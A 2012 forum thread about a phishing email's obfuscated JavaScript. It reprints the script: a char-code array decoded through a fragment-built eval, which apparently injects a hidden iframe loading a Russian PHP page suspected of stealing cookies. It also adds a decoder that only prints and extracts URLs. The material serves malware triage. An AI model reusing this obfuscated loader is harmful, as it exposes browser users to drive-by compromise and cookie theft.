View Full Version : Evil Javascript



footballjds
02-17-2012, 04:03 PM
DO NOT RUN ANYTHING IN THE ZIP UNLESS YOU KNOW WHAT YOU ARE DOING
Hello all,

I'd like some help understanding what this virus is doing.
An email was sent out en masse to my entire company. It contained a .htm with encrypted crap. I was able to figure out the URL of the site and got the source (wget in Linux).

I used JSBeautifier to make it readable and the attached is what I have.
Please use caution. Every file is labeled correctly.

I edited the JavaScript to alert me instead of actually running the script (it opens a Russian website in an iframe; after looking through the source of the Russian site I'm guessing it's trying to steal all my cookies).

let me know what you see (:

masterBB
02-17-2012, 04:31 PM
Highly suspicious. Reformatted the code in the js. Note that I've no idea what it does since I try to stay away from javascript.



if(window['d'+'o'+'c'+'ument'])          // "document" spelled out piecewise; only proceeds where a DOM exists
    aa=/\w/.exec(new Date()).index+[];   // index of the first word char in the Date string (0), coerced to "0"

aaa='0';

if(aa.indexOf(aaa)!==-1)                 // true in any normal browser; a cheap environment gate
    f=[-30,-30,66,63,-7,1,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,2,84,
    -30,-30,-30,66,63,75,58,70,62,75,1,2,20,
    -30,-30,86,-7,62,69,76,62,-7,84,
    -30,-30,-30,61,72,60,78,70,62,71,77,7,80,75,66,77,62,1,-5,21,66,63,75,58,70,62,-7,76,75,60,22,0,65,77,77,73,19,8,8,60,76,62,75,66,70,58,71,68,75,58,7,75,78,19,17,9,17,9,8,66,70,58,64,62,76,8,58,78,59,69,59,83,61,71,66,7,73,65,73,0,-7,80,66,61,77,65,22,0,10,9,0,-7,65,62,66,64,65,77,22,0,10,9,0,-7,76,77,82,69,62,22,0,79,66,76,66,59,66,69,66,77,82,19,65,66,61,61,62,71,20,73,72,76,66,77,66,72,71,19,58,59,76,72,69,78,77,62,20,69,62,63,77,19,9,20,77,72,73,19,9,20,0,23,21,8,66,63,75,58,70,62,23,-5,2,20,
    -30,-30,86,
    -30,-30,63,78,71,60,77,66,72,71,-7,66,63,75,58,70,62,75,1,2,84,
    -30,-30,-30,79,58,75,-7,63,-7,22,-7,61,72,60,78,70,62,71,77,7,60,75,62,58,77,62,30,69,62,70,62,71,77,1,0,66,63,75,58,70,62,0,2,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,76,75,60,0,5,0,65,77,77,73,19,8,8,60,76,62,75,66,70,58,71,68,75,58,7,75,78,19,17,9,17,9,8,66,70,58,64,62,76,8,58,78,59,69,59,83,61,71,66,7,73,65,73,0,2,20,63,7,76,77,82,69,62,7,79,66,76,66,59,66,69,66,77,82,22,0,65,66,61,61,62,71,0,20,63,7,76,77,82,69,62,7,73,72,76,66,77,66,72,71,22,0,58,59,76,72,69,78,77,62,0,20,63,7,76,77,82,69,62,7,69,62,63,77,22,0,9,0,20,63,7,76,77,82,69,62,7,77,72,73,22,0,9,0,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,80,66,61,77,65,0,5,0,10,9,0,2,20,63,7,76,62,77,26,77,77,75,66,59,78,77,62,1,0,65,62,66,64,65,77,0,5,0,10,9,0,2,20,
    -30,-30,-30,61,72,60,78,70,62,71,77,7,64,62,77,30,69,62,70,62,71,77,76,27,82,45,58,64,39,58,70,62,1,0,59,72,61,82,0,2,52,9,54,7,58,73,73,62,71,61,28,65,66,69,61,1,63,2,20,
    -30,-30,86];                         // each entry is a character code minus 39; the loop below rebuilds the real script

md='a';                                  // unused
e=window['e'+'val'];                     // eval, assembled from fragments to defeat naive string matching
w=f;
s='';
fr='f'+'ro'+'mChar';
r=String[fr+'Code'];                     // String.fromCharCode, same trick

for(i=0;i-w.length<0;i++){               // decode one character per array element
    j=i;
    s=s+r(39+w[j]);
}

if(aa.indexOf(aaa)!==-1)
    alert(s);                            // the original calls e(s) here; the poster swapped in alert to see the decoded script


But note the way it inits strings...
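
Added example, not code from the thread or from the sample it discusses: a decoder that mirrors the posted fromCharCode/offset loop but returns the rebuilt source instead of handing it to eval, then pulls URLs and iframe markers out of it for triage. The sample array, the names OFFSET/SAMPLE_CODES and the example.invalid URL are constructed for this demonstration.

```javascript
// Added example (not from the thread): decode the "offset + String.fromCharCode"
// array trick used by the posted script, without evaluating the result.
const OFFSET = 39; // the posted loop does r(39 + w[j])

// Constructed stand-in for the array "f" in the thread; the URL is a
// placeholder, not an indicator taken from the real sample.
const SAMPLE_SOURCE =
  "document.write('<iframe src=\"http://example.invalid/x.php\" " +
  "style=\"visibility:hidden\"></iframe>');";

function encodeOffsetArray(src, offset) {
  return Array.from(src, ch => ch.charCodeAt(0) - offset);
}
const SAMPLE_CODES = encodeOffsetArray(SAMPLE_SOURCE, OFFSET);

// Mirrors the for-loop in the sample: one character per array element.
function decodeOffsetArray(codes, offset) {
  let s = '';
  for (let i = 0; i < codes.length; i++) {
    s += String.fromCharCode(offset + codes[i]);
  }
  return s;
}

// The gate in the sample: /\w/ matches the first letter of the Date string
// at index 0, so aa becomes "0" in any normal JS engine and the check holds.
// It is a cheap environment test, not real protection.
function passesDateGate() {
  const aa = /\w/.exec(new Date()).index + [];
  return aa.indexOf('0') !== -1;
}

// What a responder wants from the decoded text: URLs, and whether it
// injects an iframe (document.write or createElement style).
function extractIndicators(source) {
  const urls = source.match(/https?:\/\/[^\s'"<>]+/g) || [];
  const hiddenIframe = /<iframe\b/i.test(source) ||
    /createElement\(['"]iframe['"]\)/i.test(source);
  return { urls, hiddenIframe };
}

function analyse(codes, offset) {
  const decoded = decodeOffsetArray(codes, offset);
  return { decoded, ...extractIndicators(decoded) };
}

const report = analyse(SAMPLE_CODES, OFFSET);
console.log(report.decoded);
console.log(report.urls, report.hiddenIframe, passesDateGate());
```

To triage a real sample, paste its array in place of SAMPLE_CODES and keep the offset the loop uses; the script only ever prints the decoded text.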

footballjds
02-17-2012, 04:45 PM
Maybe I wasn't clear. I already edited the .htm (put alert instead of e so it alerted me instead of evaluating the code).
The .txt in there is the source code of the Russian website that the .htm opens in an iframe.

I'd like to know what the Russian website does. It's something with Google cookies.

Home
02-17-2012, 05:08 PM
Wrong thread.


On topic. I have seen something similar in the past; I will try to search for it.


~Home

footballjds
02-17-2012, 06:00 PM
Wrong thread.
:confused:

And thanks for trying to look into it.